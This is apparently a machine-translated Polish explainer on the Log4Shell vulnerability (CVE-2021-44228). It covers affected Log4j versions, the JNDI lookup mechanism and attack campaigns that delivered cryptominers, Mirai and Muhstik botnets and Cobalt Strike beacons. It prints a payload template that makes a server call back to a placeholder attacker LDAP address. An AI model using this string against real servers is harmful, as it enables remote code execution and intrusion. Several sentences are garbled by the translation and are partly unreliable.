Log4Shell Vulnerability

10 grudnia 2021 r. został wydany exploit wykorzystujący krytyczną lukę w platformie logowania opartej na Javie Apache Log4jpublicznie. Podatność śledzona jako CVE-2021-44228 lub Log4Shell dotyczy wersji Log4j od Log4j 2.0-beta9 do 2.14.1. Zagrożenia mogą wykorzystać exploita do ustanowienia nieuwierzytelnionego zdalnego dostępu, wykonania kodu, dostarczania zagrożeń ze strony złośliwego oprogramowania lub zbierania informacji. Luka ma przypisany stan krytyczny, ponieważ Log4j jest powszechnie używany przez aplikacje korporacyjne i usługi w chmurze.

Log4Shell Szczegóły techniczne

Exploit rozpoczyna się od zmiany agenta użytkownika przeglądarki internetowej przez cyberprzestępcę. Następnie odwiedzają witrynę lub szukają określonego ciągu znajdującego się na stronach o formacie:

${jndi:ldap://[adres_adresu_atakującego]}

W rezultacie ciąg zostanie dodany do dzienników dostępu serwera WWW. Osoby atakujące następnie czekają, aż aplikacja Log4j przeanalizuje te dzienniki i dotrze do dołączonego ciągu. W tym przypadku wystąpi błąd, powodując, że serwer wykona wywołanie zwrotne do adresu URL znajdującego się w ciągu JNDI. Ten adres URL jest nadużywany do obsługi poleceń zakodowanych w Base64 lub klas Javanastępnie i wykonaj je na zaatakowanym urządzeniu.

Apache szybko wypuścił nową wersję - Log4j 2.15.0, aby zająć się i naprawić exploita, ale znaczna liczba podatnych systemów może pozostać niezałatana przez długi czas. Jednocześnie cyberprzestępcy szybko zauważyli lukę zero-day Log4Shell i rozpoczęli skanowanie w poszukiwaniu odpowiednich serwerów do wykorzystania. Społeczność infosec prześledziła liczne kampanie ataków wykorzystujące Log4Shell do dostarczania szerokiej gamy zagrożeń złośliwym oprogramowaniem.

Log4Shell jest używany w atakach Cryptominer, botnetach, backdoorach i zbieraniu danych

Jednym z pierwszych cyberprzestępców, którzy zaimplementowali Log4Shell w swoich operacjach, byli cyberprzestępcy stojący za botnetem Kinsing do wydobywania kryptowalut. Hakerzy wykorzystali Log4Shell do dostarczania ładunków zakodowanych w Base64 i uruchamiania skryptów powłoki. Rolą tych skryptów jest czyszczenie docelowego systemu z konkurencyjnych zagrożeń kopania kryptowalut przed uruchomieniem ich własnego złośliwego oprogramowania Kinsing.

Netlab 360 wykrył cyberprzestępców wykorzystujących tę lukę w celu zainstalowania wersji botnetów Mirai i Muhstik na złamanych urządzeniach. Te zagrożenia złośliwym oprogramowaniem mają na celu dodanie zainfekowanych systemów do sieci urządzeń i serwerów IoT, które atakujący mogą następnie poinstruować w celu uruchomienia ataków DDoS (Distributed Denial-of-Service) lub wdrożenia koparek kryptowalut.następnie.

Według Microsoft Threat Intelligence Center exploit Log4j był również celem kampanii ataków zrzucających sygnały nawigacyjne Cobalt Strike. Cobalt Strike to legalne narzędzie programowe używane do testowania penetracji systemów bezpieczeństwa firmy.Jednak jego możliwości backdoora sprawiły, że stał się on powszechną częścią arsenału wielu grup cyberprzestępców. Następnie nielegalny dostęp backdoora do sieci ofiary jest wykorzystywany do dostarczania kolejnych ładunków, takich jak oprogramowanie ransomware, złodzieje informacji i inne zagrożenia ze strony złośliwego oprogramowania.

Log4Shell można wykorzystać do pozyskania zmiennych środowiskowych zawierających dane serwera. W ten sposób atakujący mogą uzyskać dostęp do nazwy hosta, nazwy systemu operacyjnego, numeru wersji systemu operacyjnego, nazwy użytkownika, pod którą działa usługa Log4j i nie tylko.